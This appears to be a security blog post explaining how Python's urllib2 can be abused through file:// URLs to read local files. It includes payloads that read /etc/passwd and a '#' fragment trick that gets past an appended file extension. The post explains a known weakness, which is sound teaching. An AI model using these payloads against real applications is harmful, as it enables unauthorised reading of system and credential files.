Security Concerns With Python's urllib and urllib2

Python applications should not use urllib and urllib2, for the following reasons:

  1. External proxy support isn’t trivial to implement, which usually means it isn’t implemented at all.
  2. The urlopen function does not perform ANY SSL certificate verification (true of Python 2 before 2.7.9; PEP 476 made verification the default in 2.7.9 and 3.4.3).
  3. Many URL schemes are supported, including file://.
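To make reason 3 concrete, here is a small sketch that assumes Python 3, where urllib2's functionality lives in urllib.request. It builds the default opener (the same default handler set urlopen relies on) and lists the handler classes it installs. FileHandler is the one that makes file:// URLs work; reading the `handlers` attribute is an implementation detail rather than documented API.

```python
import urllib.request

# build_opener() with no arguments installs the default handlers
# that urllib.request.urlopen() also uses.
opener = urllib.request.build_opener()
handler_names = sorted(type(h).__name__ for h in opener.handlers)
print(handler_names)

# FileHandler is why file:// URLs are accepted out of the box;
# FTPHandler is installed by default as well.
print("FileHandler" in handler_names, "FTPHandler" in handler_names)
```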

For now, let's focus on number 3.

It is commonly exploited with code like the following:

>>> import urllib2
>>> attacker_controlled_input = "file:///etc/passwd"
>>> print urllib2.urlopen(attacker_controlled_input).read()
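The same behaviour can be reproduced safely in Python 3, where urllib2 became urllib.request. This sketch writes a throwaway file as a stand-in for /etc/passwd (the file name and contents are hypothetical) and reads it back through a file:// URL built with pathlib.

```python
import tempfile
import urllib.request
from pathlib import Path

with tempfile.TemporaryDirectory() as tmp:
    # Hypothetical stand-in for a sensitive file such as /etc/passwd.
    secret = Path(tmp) / "secret.txt"
    secret.write_text("root:x:0:0:root:/root:/bin/bash\n")

    # The "attacker-controlled" input is simply a file:// URL.
    attacker_controlled_input = secret.as_uri()

    # urlopen dispatches file:// URLs to its FileHandler and reads the file.
    with urllib.request.urlopen(attacker_controlled_input) as resp:
        leaked = resp.read().decode()

print(leaked)
```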

If you control attacker_controlled_input, you have roughly the same power as with an XML external entity (XXE) attack: arbitrary file read, denial of service by reading /dev/zero, and so on.

However, you must control the beginning of the input, because that is where the URL scheme (file://) goes. Without it, you cannot exploit this functionality.
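A quick Python 3 check of why the beginning matters: the scheme is parsed from the very start of the string. If the application puts its own prefix in front of your input (https://example.com/files/ below is a hypothetical prefix), the URL stays https and your payload is just part of the path.

```python
from urllib.parse import urlsplit

payload = "file:///etc/passwd"

# Attacker controls the start of the string: the scheme is "file".
direct = urlsplit(payload)
print(direct.scheme)  # → file

# Application controls the start (hypothetical prefix): the scheme stays
# "https" and the payload is buried inside the path.
prefixed = urlsplit("https://example.com/files/" + payload)
print(prefixed.scheme, prefixed.netloc, prefixed.path)
```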

Now, say you control the first part of the input, but something is appended to it, e.g.:

>>> import urllib2
>>> attacker_controlled_data = "file:///etc/passwd"
>>> ext = ".csv"
>>> print urllib2.urlopen(attacker_controlled_data + ext).read()

You are stuck! While you can read any .csv file on the system, your lofty goal of /etc/passwd is out of reach!
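A Python 3 sketch of this dead end: a throwaway file stands in for /etc/passwd (name and contents are hypothetical). Appending .csv changes the path that gets opened, so urlopen fails with a URLError instead of returning the contents.

```python
import tempfile
import urllib.request
from pathlib import Path
from urllib.error import URLError
from urllib.parse import urlsplit

ext = ".csv"

with tempfile.TemporaryDirectory() as tmp:
    # Hypothetical stand-in for /etc/passwd.
    secret = Path(tmp) / "secret.txt"
    secret.write_text("root:x:0:0:root:/root:/bin/bash\n")

    url = secret.as_uri() + ext
    # The suffix lands in the path: .../secret.txt.csv
    requested_path = urlsplit(url).path

    try:
        with urllib.request.urlopen(url):
            pass
        blocked = False
    except URLError:
        # FileHandler reports the missing file as a URLError.
        blocked = True

print(requested_path, blocked)
```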

You may be tempted to insert a NUL byte at the end of your input, e.g.:

>>> import urllib2
>>> attacker_controlled_data = "file:///etc/passwd%00"
>>> ext = ".csv"
>>> print urllib2.urlopen(attacker_controlled_data + ext).read()

But urllib2 percent-decodes %00 into a real NUL byte, and Python does not let you open files whose paths contain NUL bytes. It throws the following exception:

TypeError: must be encoded string without NULL bytes, not str
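The failing step can be reproduced without fetching anything. On POSIX, urllib2 turns the URL path into a file path by percent-decoding it, so %00 becomes an actual NUL character before the file is opened. This Python 3 sketch mimics that with urllib.parse.unquote; note that Python 3 reports the problem as a ValueError rather than Python 2's TypeError.

```python
import os
from urllib.parse import unquote, urlsplit

attacker_controlled_data = "file:///etc/passwd%00"
ext = ".csv"

# Percent-decoding the URL path turns %00 into a real NUL character.
path = unquote(urlsplit(attacker_controlled_data + ext).path)
print(repr(path))

try:
    os.stat(path)
    rejected = False
except ValueError as exc:
    # Python 3 refuses paths with embedded NULs (Python 2 raised TypeError).
    rejected = True
    print(exc)
```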

Fear not! There is still hope. Let's take a step back and remember that we are exploiting a URL library.

URL libraries have to handle all types of URLs. I will not go into an in-depth explanation of URL construction; instead, I will focus on one part, the URL fragment (everything after the #). A URL fragment is generally used by a browser to scroll to a specific location on the page (for more information, see the Wikipedia article http://en.wikipedia.org/wiki/Fragment_identifier).

However, fragments are never sent to the server, so they mean nothing to a URL-fetching library; urllib2 strips the fragment off before opening the resource.
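Python's own URL parser shows the split. In this Python 3 sketch, urllib.parse.urlsplit puts everything after # into the fragment field and leaves /etc/passwd as the path, so a suffix appended after the # never touches the file name.

```python
from urllib.parse import urlsplit

attacker_controlled_data = "file:///etc/passwd#"
ext = ".csv"

parts = urlsplit(attacker_controlled_data + ext)
print(parts.scheme)    # → file
print(parts.path)      # → /etc/passwd  (the file that would be opened)
print(parts.fragment)  # → .csv         (the appended suffix, now a fragment)
```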

Making use of this knowledge, we can craft our payload to look like this:

>>> import urllib2
>>> attacker_controlled_data = "file:///etc/passwd#"
>>> ext = ".csv"
>>> print urllib2.urlopen(attacker_controlled_data + ext).read()

This returns the contents of /etc/passwd: the appended .csv lands in the fragment, which urllib2 discards.
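An end-to-end sketch, assuming Python 3 with urllib.request in place of urllib2: a throwaway file stands in for /etc/passwd (name and contents are hypothetical), the payload ends in #, and the appended .csv is dropped along with the fragment. Request.selector shows the path that is actually resolved.

```python
import tempfile
import urllib.request
from pathlib import Path

ext = ".csv"

with tempfile.TemporaryDirectory() as tmp:
    # Hypothetical stand-in for /etc/passwd.
    secret = Path(tmp) / "secret.txt"
    secret.write_text("root:x:0:0:root:/root:/bin/bash\n")

    attacker_controlled_data = secret.as_uri() + "#"
    req = urllib.request.Request(attacker_controlled_data + ext)

    # Request splits off the fragment, so the selector is the bare path.
    selector = req.selector

    with urllib.request.urlopen(req) as resp:
        leaked = resp.read().decode()

print(selector)
print(leaked)
```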

Note that this workaround doesn't work with urllib; it only works with urllib2.

Have a good day and a wonderful Independence Day!